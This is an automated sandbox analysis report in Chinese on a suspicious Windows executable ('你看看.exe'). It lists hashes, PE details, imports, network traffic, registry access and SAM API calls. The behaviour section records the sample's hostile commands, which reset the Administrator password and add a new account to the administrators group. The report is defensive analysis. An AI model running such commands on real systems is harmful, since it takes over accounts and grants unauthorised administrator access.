魔盾安全分析报告
| 分析类型 | 开始时间 | 结束时间 | 持续时间 | 分析引擎版本 |
|---|---|---|---|---|
| FILE | 2021-04-21 21:41:57 | 2021-04-21 21:44:00 | 123 秒 | 1.4-Maldun |
| 虚拟机机器名 | 标签 | 虚拟机管理 | 开机时间 | 关机时间 |
|---|---|---|---|---|
| win7-sp1-x64-shaapp03-2 | win7-sp1-x64-shaapp03-2 | KVM | 2021-04-21 21:41:57 | 2021-04-21 21:44:01 |
| 魔盾分数 |
|---|
3.75可疑的 |
文件详细信息
| 文件名 | 你看看.exe |
|---|---|
| 文件大小 | 658566 字节 |
| 文件类型 | PE32 executable (GUI) Intel 80386, for MS Windows |
| CRC32 | FBE40411 |
| MD5 | 7e27ac9e820d387dded0c1b2757e1420 |
| SHA1 | ec17ebfd30e2a463c96c2e3ef9d0c33355ad9fa4 |
| SHA256 | 92533ccf75913058b3d68e369a55c80a1818bb7bb53921585bad408bd6c90d9f |
| SHA512 | dd349949b1f2ff4dfd90c842d27fdc82c6dc5ef485f4d777784d24769336dc0adcf698bd22ff405a657379612ded55020a2d5ed2fb19b1eba0854b3ecaa09e38 |
| Ssdeep | 12288:EhGCyqSA26tTigiyv22zrREO2BGayHK8RU6ER6vFsRgRTsc/znDLlUoQh6S1:Eh7yqxdN748KlBoHK8ROislc/zDL4r1 |
| PEiD | 无匹配 |
| Yara |
|
| VirusTotal | VirusTotal查询失败 |
特征
魔盾安全Yara检测结果 - 普通
从文件自身的二进制镜像中读取数据
self_read: process: _________.exe, pid: 2540, offset: 0x0000c000, length: 0x00094c86
异常的二进制特征
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year
anomaly: Found duplicated section names
检测到样本尝试异常命令
Anomaly: net user Administrator zzyyyds executed
运行截图
网络分析
域名解析
| 域名 | 响应 |
|---|---|
| acroipm.adobe.com |
CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net A 104.75.169.10 A 104.75.169.8 |
TCP连接
| IP地址 | 端口 |
|---|---|
| 104.75.169.10 | 80 |
UDP连接
| IP地址 | 端口 |
|---|---|
| 192.168.122.1 | 53 |
HTTP请求
| URL | HTTP数据 |
|---|---|
| http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
静态分析
PE 信息
| 初始地址 | 0x00400000 |
|---|---|
| 入口地址 | 0x00403861 |
| 声明校验值 | 0x00000000 |
| 实际校验值 | 0x000af2c4 |
| 最低操作系统版本要求 | 4.0 |
| 编译时间 | 1972-12-25 13:33:23 |
| 载入哈希 | 9165ea3e914e03bda3346f13edbd6ccd |
| 图标 |  |
| 图标精确哈希值 | 7e8d0dbe5de19f74f384ae459c5abecf |
| 图标相似性哈希值 | 439e81c5165936c3ea55d4df339c6380 |
版本信息
| LegalCopyright: | \xe4\xe8\xe7\xe6\xe6\xe6 \xe8\xe5\xe9\xe5\xe4\xe7\xe6\xe7 |
| FileVersion: | 1.0.0.0 |
| Comments: | \xe6\xe7\xe5\xe4\xe7\xe6\xe8\xe8\xe7\xe5(http://www.eyuyan.com) |
| ProductName: | \xe6\xe8\xe8\xe7\xe5 |
| ProductVersion: | 1.0.0.0 |
| FileDescription: | \xe6\xe8\xe8\xe7\xe5 |
| Translation: | 0x0804 0x04b0 |
PE数据组成
| 名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
|---|---|---|---|---|---|
| .text | 0x00001000 | 0x00004dcc | 0x00005000 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 6.52 |
| .rdata | 0x00006000 | 0x00000a4a | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 3.56 |
| .data | 0x00007000 | 0x00001f58 | 0x00002000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 2.86 |
| .data | 0x00009000 | 0x00001000 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 1.14 |
| .rsrc | 0x0000a000 | 0x00001048 | 0x00002000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.39 |
覆盖
| 偏移量: | 0x0000c000 |
| 大小: | 0x00094c86 |
资源
| 名称 | 偏移量 | 大小 | 语言 | 子语言 | 熵(Entropy) | 文件类型 |
|---|---|---|---|---|---|---|
| RT_ICON | 0x0000a5a0 | 0x00000668 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.62 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0 |
| RT_ICON | 0x0000a5a0 | 0x00000668 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.62 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0 |
| RT_ICON | 0x0000a5a0 | 0x00000668 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.62 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0 |
| RT_GROUP_ICON | 0x0000ac08 | 0x00000030 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.71 | MS Windows icon resource - 3 icons, 16x16, 16 colors |
| RT_VERSION | 0x0000ac38 | 0x00000240 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.83 | data |
| RT_MANIFEST | 0x0000ae78 | 0x000001cd | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.08 | XML 1.0 document, ASCII text, with very long lines, with no line terminators |
导入
库 KERNEL32.dll:
• 0x406000 - GetProcAddress
• 0x406004 - LoadLibraryA
• 0x406008 - CloseHandle
• 0x40600c - WriteFile
• 0x406010 - CreateDirectoryA
• 0x406014 - GetTempPathA
• 0x406018 - ReadFile
• 0x40601c - SetFilePointer
• 0x406020 - CreateFileA
• 0x406024 - GetModuleFileNameA
• 0x406028 - GetStringTypeA
• 0x40602c - LCMapStringW
• 0x406030 - LCMapStringA
• 0x406034 - HeapAlloc
• 0x406038 - HeapFree
• 0x40603c - GetModuleHandleA
• 0x406040 - GetStartupInfoA
• 0x406044 - GetCommandLineA
• 0x406048 - GetVersion
• 0x40604c - ExitProcess
• 0x406050 - HeapDestroy
• 0x406054 - HeapCreate
• 0x406058 - VirtualFree
• 0x40605c - VirtualAlloc
• 0x406060 - HeapReAlloc
• 0x406064 - TerminateProcess
• 0x406068 - GetCurrentProcess
• 0x40606c - UnhandledExceptionFilter
• 0x406070 - FreeEnvironmentStringsA
• 0x406074 - FreeEnvironmentStringsW
• 0x406078 - WideCharToMultiByte
• 0x40607c - GetEnvironmentStrings
• 0x406080 - GetEnvironmentStringsW
• 0x406084 - SetHandleCount
• 0x406088 - GetStdHandle
• 0x40608c - GetFileType
• 0x406090 - RtlUnwind
• 0x406094 - GetCPInfo
• 0x406098 - GetACP
• 0x40609c - GetOEMCP
• 0x4060a0 - MultiByteToWideChar
• 0x4060a4 - GetStringTypeW
库 USER32.dll:
• 0x4060ac - MessageBoxA
• 0x4060b0 - wsprintfA
投放文件
行为分析
互斥量(Mutexes)
- Local\MSCTF.Asm.MutexDefault1
执行的命令
- net user Administrator zzyyyds
- net user zzyyyds 666666 /add
- net localgroup administrators 666666 /add
- C:\Windows\system32\net1 user Administrator zzyyyds
- C:\Windows\system32\net1 user zzyyyds 666666 /add
- C:\Windows\system32\net1 localgroup administrators 666666 /add
创建的服务
无信息
启动的服务
无信息
进程
_________.exe PID: 2540, 上一级进程 PID: 2232
net.exe PID: 2696, 上一级进程 PID: 2540
net.exe PID: 2740, 上一级进程 PID: 2540
net.exe PID: 2792, 上一级进程 PID: 2540
net1.exe PID: 2996, 上一级进程 PID: 2740
net1.exe PID: 2892, 上一级进程 PID: 2696
net1.exe PID: 3048, 上一级进程 PID: 2792
访问的文件
- C:\Users\test\AppData\Local\Temp\_________.exe
- C:\Users\test\AppData\Local\Temp\E_N60005
- C:\Users\test\AppData\Local\Temp\E_N60005\krnln.fnr
- C:\Users\test\AppData\Local\Temp\WINMM.dll
- C:\Windows\System32\winmm.dll
- C:\Users\test\AppData\Local\Temp\_________.exe.Local\
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
- C:\Users\test\AppData\Local\Temp\WINSPOOL.DRV
- C:\Windows\System32\winspool.drv
- C:\Users\test\AppData\Local\Temp\OLEPRO32.DLL
- C:\Windows\System32\olepro32.dll
- C:\Windows\Globalization\Sorting\sortdefault.nls
- \??\PIPE\lsarpc
- C:\DosDevices\pipe\
- \??\PIPE\samr
- \Device\KsecDD
- C:\Windows\SysWOW64\netmsg.dll
读取的文件
- C:\Users\test\AppData\Local\Temp\_________.exe
- C:\Users\test\AppData\Local\Temp\E_N60005\krnln.fnr
- C:\Windows\System32\winmm.dll
- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
- C:\Windows\System32\winspool.drv
- C:\Windows\System32\olepro32.dll
- C:\Windows\Globalization\Sorting\sortdefault.nls
- \??\PIPE\lsarpc
- \??\PIPE\samr
- \Device\KsecDD
- C:\Windows\SysWOW64\netmsg.dll
修改的文件
- C:\Users\test\AppData\Local\Temp\E_N60005\krnln.fnr
- \??\PIPE\lsarpc
- \??\PIPE\samr
删除的文件
无信息
注册表键
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\UseFilter
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\krnln.fnr
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\_________.exe
- HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3FC47A08-E5C9-4BCA-A2C7-BC9A282AED14}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
- HKEY_CURRENT_USER
- HKEY_CURRENT_USER\Keyboard Layout\Toggle
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
- HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
- HKEY_CURRENT_USER\Software\Microsoft\CTF\LayoutIcon\0804\00000804
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
- HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TimeZoneInformation
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\Bias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardName
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardBias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardStart
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightName
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightBias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightStart
读取的注册表键
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\UseFilter
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions\krnln.fnr
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
- HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\Bias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardName
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardBias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\StandardStart
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightName
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightBias
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation\DaylightStart
修改的注册表键
无信息
删除的注册表键
无信息
API解析
- kernel32.dll.IsProcessorFeaturePresent
- krnln.fnr.GetNewSock
- cryptbase.dll.SystemFunction036
- kernel32.dll.SortGetHandle
- kernel32.dll.SortCloseHandle
- krnln.fnr.GetNewInf
- ole32.dll.CoInitializeEx
- ole32.dll.CoUninitialize
- ole32.dll.CoRegisterInitializeSpy
- ole32.dll.CoRevokeInitializeSpy
- oleaut32.dll.SysAllocString
- oleaut32.dll.SysStringLen
- oleaut32.dll.SysFreeString
- samlib.dll.SamConnect
- rpcrt4.dll.NdrClientCall2
- rpcrt4.dll.RpcStringBindingComposeW
- rpcrt4.dll.RpcBindingFromStringBindingW
- rpcrt4.dll.RpcStringFreeW
- rpcrt4.dll.RpcBindingFree
- samlib.dll.SamEnumerateDomainsInSamServer
- samlib.dll.SamLookupDomainInSamServer
- samlib.dll.SamFreeMemory
- samlib.dll.SamOpenDomain
- samlib.dll.SamCreateUser2InDomain
- samlib.dll.SamQueryInformationUser
- samlib.dll.SamSetInformationUser
- cryptbase.dll.SystemFunction028
- rpcrt4.dll.NDRCContextBinding
- rpcrt4.dll.RpcBindingToStringBindingW
- rpcrt4.dll.I_RpcMapWin32Status
- rpcrt4.dll.RpcStringBindingParseW
- samlib.dll.SamCloseHandle